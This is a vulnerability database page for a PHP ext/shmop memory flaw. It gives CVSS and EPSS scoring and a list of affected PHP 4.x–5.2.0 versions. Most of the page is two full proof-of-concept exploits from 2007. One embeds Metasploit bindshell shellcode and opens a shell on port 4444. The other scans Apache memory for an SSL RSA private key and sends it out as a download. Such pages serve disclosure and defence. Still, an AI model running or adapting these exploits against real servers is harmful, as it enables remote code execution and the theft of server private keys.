Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 3426
Publication date : 2007-03-06 23h00 +00:00
Author : Stefan Esser
EDB Verified : Yes
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP ext/shmop Code Execution Exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
if (!extension_loaded("gd") || !extension_loaded("shmop")) {
die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
}
// This exploit contains a bindshell shellcode for linux x86 from metasploit
// Therefore it only works with linux x86. It only works in PHP < 5.2.0 because
// it searches for the shellcode by simply scanning the Apache memory
// which is not possible with the new memory manager anymore
$shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";
function init()
{
global $rid;
$rid = imagecreate(10,10);
imagecolorallocate($rid, 0, 0, 0);
imagecolorallocate($rid, 0, 0, 0);
}
function peek($addr, $size)
{
global $rid;
imagecolordeallocate($rid, 0);
imagecolordeallocate($rid, 1);
imagecolorallocate($rid, $addr, 0, 0);
imagecolorallocate($rid, $size, 0, 0);
return shmop_read((int)$rid, 0, $size);
}
function poke($addr, $val)
{
global $rid;
imagecolordeallocate($rid, 0);
imagecolordeallocate($rid, 1);
imagecolorallocate($rid, $addr, 0, 0);
imagecolorallocate($rid, strlen($val), 0, 0);
return shmop_write((int)$rid, $val, 0);
}
init();
$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = ""; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }
$offset = 0x08048000 + 1024 * 64;
while (1) {
$data = peek($offset, 1024 + 16);
$position = strpos($data, "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00");
if ($position !== false && $position < 1024) {
$addr = unpack("L", peek($offset+$position+24, 4));
$addr = $addr[1] + 32;
$addr = pack("L", $addr);
poke($offset+$position+32, $addr);
echo "There should be a shell bound to port 4444 now\n\n";
unset($arr);
die();
}
$offset += 1024;
}
?>
# milw0rm.com [2007-03-07]
Exploit Database EDB-ID : 3427
Publication date : 2007-03-06 23h00 +00:00
Author : Stefan Esser
EDB Verified : Yes
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP ext/shmop SSL RSA Private-Key Disclosure Exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
if (!extension_loaded("gd") || !extension_loaded("shmop")) {
die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
}
function init()
{
global $rid;
$rid = imagecreate(10,10);
imagecolorallocate($rid, 0, 0, 0);
imagecolorallocate($rid, 0, 0, 0);
}
function peek($addr, $size)
{
global $rid;
imagecolordeallocate($rid, 0);
imagecolordeallocate($rid, 1);
imagecolorallocate($rid, $addr, 0, 0);
imagecolorallocate($rid, $size, 0, 0);
return shmop_read((int)$rid, 0, $size);
}
init();
$offset = 0x08048000 + 1024 * 64;
while (1) {
$data = peek($offset, 1024 + 16);
$position = strpos($data, "\x30\x82");
if ($position !== false && $position < 1024) {
// Potential Key
if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") {
$length = ord($data[$position+2])*256+ord($data[$position+3])+4;
$keydata = peek($offset + $position, $length);
// Assume an exponent of 0x10001 to really find a RSA key and not a DSA one
if (strpos($keydata, "\x01\x00\x01") > 0)
break;
}
}
$offset += 1024;
}
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"server.der\"");
echo $keydata;
?>
# milw0rm.com [2007-03-07]
Products Mentioned
Configuraton 0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0
Php>>Php >> Version 4.0.0
Php>>Php >> Version 4.0.1
Php>>Php >> Version 4.0.1
Php>>Php >> Version 4.0.1
Php>>Php >> Version 4.0.2
Php>>Php >> Version 4.0.3
Php>>Php >> Version 4.0.3
Php>>Php >> Version 4.0.4
Php>>Php >> Version 4.0.4
Php>>Php >> Version 4.0.5
Php>>Php >> Version 4.0.6
Php>>Php >> Version 4.0.7
Php>>Php >> Version 4.0.7
Php>>Php >> Version 4.0.7
Php>>Php >> Version 4.0.7
Php>>Php >> Version 4.1.0
Php>>Php >> Version 4.1.1
Php>>Php >> Version 4.1.2
Php>>Php >> Version 4.2
Php>>Php >> Version 4.2.0
Php>>Php >> Version 4.2.1
Php>>Php >> Version 4.2.2
Php>>Php >> Version 4.2.3
Php>>Php >> Version 4.3.0
Php>>Php >> Version 4.3.1
Php>>Php >> Version 4.3.2
Php>>Php >> Version 4.3.3
Php>>Php >> Version 4.3.4
Php>>Php >> Version 4.3.5
Php>>Php >> Version 4.3.6
Php>>Php >> Version 4.3.7
Php>>Php >> Version 4.3.8
Php>>Php >> Version 4.3.9
Php>>Php >> Version 4.3.10
Php>>Php >> Version 4.3.11
Php>>Php >> Version 4.4.0
Php>>Php >> Version 4.4.1
Php>>Php >> Version 4.4.2
Php>>Php >> Version 4.4.3
Php>>Php >> Version 4.4.4
Php>>Php >> Version 4.4.5
Php>>Php >> Version 5.0
Php>>Php >> Version 5.0
Php>>Php >> Version 5.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.0
Php>>Php >> Version 5.0.1
Php>>Php >> Version 5.0.2
Php>>Php >> Version 5.0.3
Php>>Php >> Version 5.0.4
Php>>Php >> Version 5.0.5
Php>>Php >> Version 5.1.0
Php>>Php >> Version 5.1.1
Php>>Php >> Version 5.1.2
Php>>Php >> Version 5.1.3
Php>>Php >> Version 5.1.4
Php>>Php >> Version 5.1.5
Php>>Php >> Version 5.1.6
Php>>Php >> Version 5.2.0
References